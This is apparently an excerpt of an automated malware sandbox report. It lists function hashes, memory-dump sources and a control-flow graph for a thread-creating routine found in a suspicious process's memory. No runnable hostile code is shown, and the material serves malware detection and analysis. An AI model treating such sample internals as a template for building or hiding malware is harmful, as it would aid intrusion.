                                                              Function 04EE2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4f98d71d778fe125ac9af88158e786a8953e2d2d26ace13f32375fef1610524b
                                                              • Instruction ID: ee070204f64d606a8d02f84bb6d440776eb9bd9444e600d6d0a914e8f45f328b
                                                              • Opcode Fuzzy Hash: 4f98d71d778fe125ac9af88158e786a8953e2d2d26ace13f32375fef1610524b
                                                              • Instruction Fuzzy Hash: 0D90023120180402F540759858096460005DBE1305F55E011A6425555EC765D9A16131
                                                              Function 04EE2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4f56ab99b4a5808c45850f9a143c3b73a0c363406eb564730ef9c525fc715ccd
                                                              • Instruction ID: 9657d7a806fcfb1355aa317b93ed655484c08665b06701caa70b1f8cf0476b08
                                                              • Opcode Fuzzy Hash: 4f56ab99b4a5808c45850f9a143c3b73a0c363406eb564730ef9c525fc715ccd
                                                              • Instruction Fuzzy Hash: 5A90023120180842F54071584805B460005DBE1305F55D016A1525654D8715D9617521
                                                              Function 04EE2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: a0493fc53d098ccc192113d24653b51eab8f57659794f368188af2f684ed4d65
                                                              • Instruction ID: ebc9ee38c70eff7c835909a1e2f6402cb8f6e13659881f3131232e211d695e1d
                                                              • Opcode Fuzzy Hash: a0493fc53d098ccc192113d24653b51eab8f57659794f368188af2f684ed4d65
                                                              • Instruction Fuzzy Hash: A590023120188802F5507158880574A0005DBD1305F59D411A5825658D8795D9A17121
                                                              Function 04EE2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 66c8017e6d85f897ee15abf90949db62d0e2d2825f10b89597793895e11d17b8
                                                              • Instruction ID: 5c60fef43b414eef7806e714724c7785a4e648b7db32c6eae8dbfa68e022a425
                                                              • Opcode Fuzzy Hash: 66c8017e6d85f897ee15abf90949db62d0e2d2825f10b89597793895e11d17b8
                                                              • Instruction Fuzzy Hash: 8B90023120180413F551715849057070009DBD1245F95D412A1825558D9756DA62A121
                                                              Function 04EE2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c594ce18a87058a343a38d0dff26097be7e59154520dc13b755e9311762ce607
                                                              • Instruction ID: f6a432a6aa342f8e3451b17514355e5c20e33bee148d1411750fed7f5fcec54b
                                                              • Opcode Fuzzy Hash: c594ce18a87058a343a38d0dff26097be7e59154520dc13b755e9311762ce607
                                                              • Instruction Fuzzy Hash: 40900231242841527985B15848055074006EBE1245795D012A2815950C8726E966D621
                                                              Function 04EE2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 558c5cb19efc210e151256fa02446e537809eb73bec3fa3946773ecd003c5ccd
                                                              • Instruction ID: da6c779bf9713e41c6b3e43df9a5d66f12bcb93d03c4b61019db2426ccb457bc
                                                              • Opcode Fuzzy Hash: 558c5cb19efc210e151256fa02446e537809eb73bec3fa3946773ecd003c5ccd
                                                              • Instruction Fuzzy Hash: 0B90023130180003F580715858196064005EBE2305F55E011E1815554CDB15D9665222
                                                              Function 04EE2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 331a23ee45865fb3dc68a7b18909178be98bece3033c14e3a84c0bd864c65b37
                                                              • Instruction ID: 29d20d229ae7c8febdf34d1d4857c53037faf017d3095f8610a1fbc566ceb505
                                                              • Opcode Fuzzy Hash: 331a23ee45865fb3dc68a7b18909178be98bece3033c14e3a84c0bd864c65b37
                                                              • Instruction Fuzzy Hash: 4890023921380002F5C07158580960A0005DBD2206F95E415A1416558CCB15D9795321
                                                              Function 04EE2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3da282c10e02c4b3ba99035ec0154b39db8b9f56f28fdb164e1b8b8c0cac5be8
                                                              • Instruction ID: 9b4e3ae246ea24ca94d2feefcd143c3c0285246eccf514ab0894b002f34f5b58
                                                              • Opcode Fuzzy Hash: 3da282c10e02c4b3ba99035ec0154b39db8b9f56f28fdb164e1b8b8c0cac5be8
                                                              • Instruction Fuzzy Hash: 3C900271201C0403F58075584C056070005DBD1306F55D011A3465555E8B29DD616135
                                                              Function 04EE2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 75b5a2e2d725f01659bd342ce6b54076c017466cfde2f085df9bc63bc432edb7
                                                              • Instruction ID: 95ebd07ccd05febb81d11b0ad73751f2977592f498411b98d4780bd83320f795
                                                              • Opcode Fuzzy Hash: 75b5a2e2d725f01659bd342ce6b54076c017466cfde2f085df9bc63bc432edb7
                                                              • Instruction Fuzzy Hash: A590023160180502F54171584805616000ADBD1245F95D022A2425555ECB25DAA2A131
                                                              Function 04EE2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 0436cddd9c7d29951dc3dc24fc6b4af01b49dab6ae54b9ed05a9df145617d3e8
                                                              • Instruction ID: 24efdd4e0455d3149823f29297f3c72ac2924220744771d6eddae5a436271d63
                                                              • Opcode Fuzzy Hash: 0436cddd9c7d29951dc3dc24fc6b4af01b49dab6ae54b9ed05a9df145617d3e8
                                                              • Instruction Fuzzy Hash: 77900231211C0042F64075684C15B070005DBD1307F55D115A1555554CCB15D9715521
                                                              Function 04EE2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: d5ccb68837fb2e4c637f040d6981a0df8bd040905e9c5cf0e90a5b09a371bfa3
                                                              • Instruction ID: 63380089cd8c532a7796f456d9714bde0e2f88aa8983f45cb0dfd3d1c662beda
                                                              • Opcode Fuzzy Hash: d5ccb68837fb2e4c637f040d6981a0df8bd040905e9c5cf0e90a5b09a371bfa3
                                                              • Instruction Fuzzy Hash: 4290023160180042658071688C459064005FFE2215755D121A1D99550D8759D9755665
                                                              Function 04EE2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 33e5339d873b5bc828d6a784fbbd0578b206bab8e8b1cd587725304b86f6e13e
                                                              • Instruction ID: cf4adba89115cefc2dfd850a6769294fd9a8f946101a5778292ef6f5205dd68d
                                                              • Opcode Fuzzy Hash: 33e5339d873b5bc828d6a784fbbd0578b206bab8e8b1cd587725304b86f6e13e
                                                              • Instruction Fuzzy Hash: 2F90027134180442F54071584815B060005DBE2305F55D015E2465554D8719DD626126
                                                              Function 04EE2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 7f94f570e91a36b1de989f4ffa502baa737e4de887d265ff6f32244b55f00a16
                                                              • Instruction ID: 5d44b7d022a7911881b495065484a57a7121a75191e35bdf01a513aabbcd3c5f
                                                              • Opcode Fuzzy Hash: 7f94f570e91a36b1de989f4ffa502baa737e4de887d265ff6f32244b55f00a16
                                                              • Instruction Fuzzy Hash: D2900235221800022585B5580A0550B0445EBD7355395D015F2817590CC721D9755321
                                                              Function 04EE2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: f606d00ed4ccddea0dd2d5e2d11aef197dac4f1a0782f7f9741714c64426293e
                                                              • Instruction ID: c97d45c22ffcf0c4a8718fe7194f2451c606a8069339b0f3f5948113637f51a7
                                                              • Opcode Fuzzy Hash: f606d00ed4ccddea0dd2d5e2d11aef197dac4f1a0782f7f9741714c64426293e
                                                              • Instruction Fuzzy Hash: B7900235211800032545B5580B055070046DBD6355355D021F2416550CD721D9715121
                                                              Function 04EE2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 211a580d1279bc623434ca89cf12ab7e2bf41493fe8df860f54aa639d2647d7b
                                                              • Instruction ID: daeb921f61459c14d003be353ad35cc168de681a14346fc032c10090af6b823b
                                                              • Opcode Fuzzy Hash: 211a580d1279bc623434ca89cf12ab7e2bf41493fe8df860f54aa639d2647d7b
                                                              • Instruction Fuzzy Hash: 4590023120584842F58071584805A460015DBD1309F55D011A1465694D9725DE65B661
                                                              Function 04EE2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: fc7cb2f312a8531427ba96826eb694ef6004b9fcd82a7389c47fb723e4562d26
                                                              • Instruction ID: 2bb902ce60ac6dbcf3cb0d35255ae79a061626f4e1d34fd5695e55dbe60bfa92
                                                              • Opcode Fuzzy Hash: fc7cb2f312a8531427ba96826eb694ef6004b9fcd82a7389c47fb723e4562d26
                                                              • Instruction Fuzzy Hash: FA90023120180802F5C07158480564A0005DBD2305F95D015A1426654DCB15DB6977A1
                                                              Function 04EE2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: e1f5bffb12e46b8849aa21f9a43c886e0bafe02054c86112e5dfe9f5f2156115
                                                              • Instruction ID: ce2514347184345e12ff55599a07b795c63c8231276ff890991a860e1f0c79d6
                                                              • Opcode Fuzzy Hash: e1f5bffb12e46b8849aa21f9a43c886e0bafe02054c86112e5dfe9f5f2156115
                                                              • Instruction Fuzzy Hash: BD90023160580802F590715848157460005DBD1305F55D011A1425654D8755DB6576A1
                                                              Function 04EE2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 6f4f7fc57edf7dcaa689891f246556daebdfe3793bad11c28cd13498920837e2
                                                              • Instruction ID: 3dc9866adc33832fb389beeac1074158fd23abce525dfb44771a021b94c0a8e7
                                                              • Opcode Fuzzy Hash: 6f4f7fc57edf7dcaa689891f246556daebdfe3793bad11c28cd13498920837e2
                                                              • Instruction Fuzzy Hash: 2690027120280003654571584815616400ADBE1205B55D021E2415590DC725D9A16125
                                                              Function 04EE35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: bee53edea5d4a3bafe828569f7cd4b785fa634e583ff47775ef619f998bd73c2
                                                              • Instruction ID: 71c68bfe662a2773c7b2f650cd1ffac0c6dafd9c5e2dc55daa74ace4cd4d1cb2
                                                              • Opcode Fuzzy Hash: bee53edea5d4a3bafe828569f7cd4b785fa634e583ff47775ef619f998bd73c2
                                                              • Instruction Fuzzy Hash: 6890023160590402F540715849157061005DBD1205F65D411A1825568D8795DA6165A2
                                                              Function 04EE39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 7d31a8b036e41519a5bcf835ee013aa5281292344e635185ba74cdb656837e65
                                                              • Instruction ID: 3ec498387a1507c3527db8b6aa4a76624439000b19db04c099183ebce2b16bb6
                                                              • Opcode Fuzzy Hash: 7d31a8b036e41519a5bcf835ee013aa5281292344e635185ba74cdb656837e65
                                                              • Instruction Fuzzy Hash: 1090023124585102F590715C48056164005FBE1205F55D021A1C15594D8755D9656221
                                                              Function 02EC9E36 Relevance: 35.1, APIs: 1, Strings: 19, Instructions: 134threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 28 2ec9e36-2ec9e37 29 2ec9e0c-2ec9e11 28->29 30 2ec9e39-2eca152 28->30 31 2ec9e30-2ec9e35 29->31 32 2ec9e13-2ec9e2f call 2eeca47 CreateThread 29->32 33 2eca15c-2eca163 30->33 35 2eca19e 33->35 36 2eca165-2eca19c 33->36 37 2eca1a5-2eca1af 35->37 36->33 39 2eca1e7-2eca1f0 37->39 40 2eca1b1-2eca1cb 37->40 43 2eca206-2eca210 39->43 44 2eca1f2-2eca204 39->44 41 2eca1cd-2eca1d1 40->41 42 2eca1d2-2eca1d4 40->42 41->42 45 2eca1e5 42->45 46 2eca1d6-2eca1df 42->46 47 2eca221-2eca22d 43->47 44->39 45->37 46->45 48 2eca23d-2eca241 47->48 49 2eca22f-2eca23b 47->49 50 2eca25c-2eca274 48->50 51 2eca243-2eca25a 48->51 49->47 53 2eca285-2eca291 50->53 51->48 54 2eca2a8-2eca2b2 53->54 55 2eca293-2eca2a6 53->55 56 2eca2c3-2eca2cf 54->56 55->53 58 2eca2e5-2eca2ee 56->58 59 2eca2d1-2eca2e3 56->59 60 2eca2f4-2eca2f7 58->60 61 2eca510-2eca517 58->61 59->56 65 2eca2fd-2eca304 60->65 63 2eca519-2eca548 61->63 64 2eca54a-2eca551 61->64 63->61 66 2eca5c3-2eca5cd 64->66 67 2eca553-2eca55d 64->67 68 2eca32b-2eca335 65->68 69 2eca306-2eca329 65->69 72 2eca5de-2eca5e7 66->72 70 2eca56e-2eca57a 67->70 71 2eca346-2eca352 68->71 69->65 73 2eca57c-2eca58b 70->73 74 2eca58d call 2eeb0e0 70->74 75 2eca354-2eca363 71->75 76 2eca365-2eca36c 71->76 77 2eca5fe-2eca607 72->77 78 2eca5e9-2eca5fc 72->78 79 2eca55f-2eca568 73->79 86 2eca592-2eca59e 74->86 75->71 81 2eca36e-2eca391 76->81 82 2eca393-2eca39d 76->82 78->72 79->70 81->76 85 2eca3ae-2eca3ba 82->85 87 2eca3bc-2eca3c9 85->87 88 2eca3cb-2eca3da 85->88 86->66 89 2eca5a0-2eca5c1 86->89 87->85 90 2eca3dc-2eca3e3 88->90 91 2eca40d-2eca417 88->91 89->86 93 2eca408 90->93 94 2eca3e5-2eca3fb 90->94 95 2eca428-2eca434 91->95 93->61 96 2eca3fd-2eca403 94->96 97 2eca406 94->97 98 2eca44a-2eca454 95->98 99 2eca436-2eca448 95->99 96->97 97->90 100 2eca465-2eca471 98->100 99->95 102 2eca493-2eca499 100->102 103 2eca473-2eca480 100->103 106 2eca49d-2eca4a4 102->106 104 2eca491 103->104 105 2eca482-2eca48b 103->105 104->100 105->104 108 2eca4c9-2eca4d3 106->108 109 2eca4a6-2eca4bc 106->109 112 2eca4e4-2eca4ed 108->112 110 2eca4be-2eca4c4 109->110 111 2eca4c7 109->111 110->111 111->106 113 2eca4ef-2eca4fb 112->113 114 2eca50b 112->114 115 2eca4fd-2eca503 113->115 116 2eca509 113->116 114->58 115->116 116->112
                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02EC9E25
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3282607865.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
